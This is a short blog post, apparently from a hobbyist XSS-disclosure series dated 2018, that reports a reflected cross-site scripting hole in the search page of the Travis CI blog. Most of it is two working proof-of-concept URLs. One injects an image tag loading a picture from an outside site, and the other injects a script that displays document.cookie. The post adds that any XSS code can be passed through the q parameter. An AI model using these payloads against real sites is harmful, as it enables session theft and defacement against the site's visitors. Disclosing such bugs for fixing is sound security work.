Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av RoLex den 2018-02-24 22:543 likes

Kommentarer

There are no comments for this news article, you can write one here.
« Xakep.ru XSS bugEmbarcadero community XSS bug »